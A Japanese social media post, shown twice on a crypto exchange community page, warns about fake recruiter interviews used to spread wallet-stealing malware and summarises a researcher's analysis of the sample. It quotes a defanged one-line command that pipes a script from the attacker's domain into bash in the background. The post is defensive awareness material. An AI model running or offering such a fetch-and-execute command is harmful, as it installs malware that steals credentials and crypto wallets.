広場
最新
注目
ニュース
プロフィール
ポスト
TheSmartApe🔥
2026-04-25 16:03:31
フォロー
偽の求人面接に注意してください。彼らは今や最もクリーンなマルウェア配信経路の一つです。
今週、私の兄もほとんど被害に遭いそうになりました。
手順を追って説明します:
> 「リクルーター」がLinkedInで彼に連絡を取る
> 実際に彼の履歴書を読んでおり、彼の技術スタックを把握している。彼らは本物の面接時間を予約する。
> 通話の数時間前:「ちょっとだけ、私たちの製品ページを確認してもらえますか?」
> サイトにアクセスすると、バックグラウンドでこれが実行される:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
パスワードを求められたら入力すると終わりです。
リバースエンジニアリングを行ったGithubの(Darksp33d研究者によると:
> すべての設定文字列は570のユニークなカスタム関数で暗号化されている
> 解読後:完全なC2サーバー、エンドポイントリスト、そして開発者に法的召喚状が出ているセントリーエラー追跡用DSNが含まれる
> 276のターゲットとなったChrome拡張ID、188の暗号通貨ウォレットをカバー
> DPRKの「感染性面接」とのTTPの重複が強い
> VirusTotalでは9/64。CrowdStrike、Sophos、Malwarebytesはすべて見逃している
本物のリクルーター、本物の履歴書、本物の面接時間、本物のように見えるサイト。1行のcurlコマンドであなたのウォレットを奪われる。
もし「リクルーター」があなたに端末で何かを実行させようとしたら、たとえそれがビルドスクリプトのような無害なものであっても、タブを閉じてください。
原文表示
このページには第三者のコンテンツが含まれている場合があり、情報提供のみを目的としております(表明・保証をするものではありません)。Gateによる見解の支持や、金融・専門的な助言とみなされるべきものではありません。詳細については
免責事項
をご覧ください。
報酬
いいね
コメント
リポスト
共有
コメント
コメントを追加
コメントを追加
コメント
コメントなし
人気の話題
もっと見る
#
WCTCTradingKingPK
215.44K 人気度
#
CryptoMarketSeesVolatility
275.16K 人気度
#
IsraelStrikesIranBTCPlunges
32.86K 人気度
#
rsETHAttackUpdate
94.47K 人気度
#
US-IranTalksStall
361.26K 人気度
ピン
サイトマップ
偽の求人面接に注意してください。彼らは今や最もクリーンなマルウェア配信経路の一つです。
今週、私の兄もほとんど被害に遭いそうになりました。
手順を追って説明します:
> 「リクルーター」がLinkedInで彼に連絡を取る
> 実際に彼の履歴書を読んでおり、彼の技術スタックを把握している。彼らは本物の面接時間を予約する。
> 通話の数時間前:「ちょっとだけ、私たちの製品ページを確認してもらえますか?」
> サイトにアクセスすると、バックグラウンドでこれが実行される:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
パスワードを求められたら入力すると終わりです。
リバースエンジニアリングを行ったGithubの(Darksp33d研究者によると:
> すべての設定文字列は570のユニークなカスタム関数で暗号化されている
> 解読後:完全なC2サーバー、エンドポイントリスト、そして開発者に法的召喚状が出ているセントリーエラー追跡用DSNが含まれる
> 276のターゲットとなったChrome拡張ID、188の暗号通貨ウォレットをカバー
> DPRKの「感染性面接」とのTTPの重複が強い
> VirusTotalでは9/64。CrowdStrike、Sophos、Malwarebytesはすべて見逃している
本物のリクルーター、本物の履歴書、本物の面接時間、本物のように見えるサイト。1行のcurlコマンドであなたのウォレットを奪われる。
もし「リクルーター」があなたに端末で何かを実行させようとしたら、たとえそれがビルドスクリプトのような無害なものであっても、タブを閉じてください。